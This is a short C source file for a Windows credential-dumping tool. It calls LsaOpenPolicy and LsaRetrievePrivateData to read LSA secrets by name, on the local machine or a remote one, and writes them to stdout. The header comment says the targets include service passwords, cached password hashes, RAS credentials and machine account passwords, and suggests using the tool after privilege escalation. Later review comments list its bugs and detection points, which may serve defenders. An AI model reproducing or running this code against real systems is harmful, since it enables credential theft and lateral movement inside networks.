/*
* Must be run as administrator. Might be a good thing to play with after
* running getadmin ;-0 -- also note this works on raw 4.0 with no SPs.
*
* Run as: prog _sc_schedule [machine], prog nl$1, prog w3_root_data
* or any other registry key under NTLM\security\policy\secrets.
* You should be able to get service passwords, cached password hashes
* of the last users to login, RAS accounts and passwords, workstation
* passwords for domain access, etc.
*/
#include <
windows.h>
#include <
stdio.h>
#include "ntsecapi.h"
#define AST(x) if (!(x)) {printf("Failed line %d\n", __LINE__);exit(1);} else
void write();
/*
 * Wrap a NUL-terminated wide string in an LSA_UNICODE_STRING descriptor.
 *
 * The descriptor is a single file-scope static, so the returned pointer is
 * only valid until the next call and must not be freed by the caller.  No
 * copy of x is made; Buffer aliases the caller's memory.  Length and
 * MaximumLength are byte counts (the descriptor fields are narrower than
 * size_t, so very long strings would be truncated on assignment).
 */
PLSA_UNICODE_STRING
str(LPWSTR x)
{
    static LSA_UNICODE_STRING desc;
    size_t chars = wcslen(x);

    desc.Buffer = x;
    desc.Length = chars * sizeof(WCHAR);
    /* Room for the terminating NUL as well. */
    desc.MaximumLength = (chars + 1) * sizeof(WCHAR);
    return &desc;
}
/*
 * Entry point.  argv[1] is the name of the LSA secret to read; the optional
 * argv[2] is the machine whose policy database is opened (otherwise an empty
 * name is passed).  The raw bytes of the secret are written to stdout.
 *
 * Review notes for anyone assessing or detecting this tool:
 *  - Opening the policy database and reading private data needs
 *    administrative rights on the target (see file header); the same call
 *    sequence works against a remote machine when a host name is given.
 *  - argv[1] is used without checking argc, so running the program with no
 *    arguments dereferences a null pointer.
 *  - wsprintfW takes no destination size, so arguments longer than the
 *    256-WCHAR buffers below can overrun them.
 *  - The buffer returned by LsaRetrievePrivateData is never released with
 *    LsaFreeMemory, and the return values of write() and LsaClose are not
 *    checked.  write() is declared above with no prototype (void write();).
 *  - NOTE(review): whether these LSA calls leave an audit trail depends on
 *    the audit policy in effect on the target -- confirm for the platform in
 *    question.
 */
int _cdecl
main(int argc, char *argv[])
{
LSA_HANDLE pol;
/* Descriptor for the retrieved secret; allocated by the LSA, not by us. */
PLSA_UNICODE_STRING foo;
LSA_OBJECT_ATTRIBUTES attrs;
/* Fixed 256-WCHAR buffers; the %hS conversions below widen the narrow argv
 * strings into them with no bound check. */
WCHAR keyname[256]=L"";
WCHAR host[256]=L"";
wsprintfW(keyname, L"%hS", argv[1]);
if(argc == 3) wsprintfW(host, L"%hS", argv[2]);
/* LsaOpenPolicy requires a zeroed attributes block. */
memset(&attrs, 0, sizeof(attrs));
/* AST aborts the program with the failing line number on any non-zero
 * NTSTATUS. */
AST(!LsaOpenPolicy(str(host), &attrs, 0, &pol));
AST(!LsaRetrievePrivateData(pol, str(keyname), &foo));
/* Dump the secret as raw bytes (Length is a byte count) to fd 1 (stdout). */
write(1, foo->
Buffer, foo->
Length);
LsaClose(pol);
exit(0);
}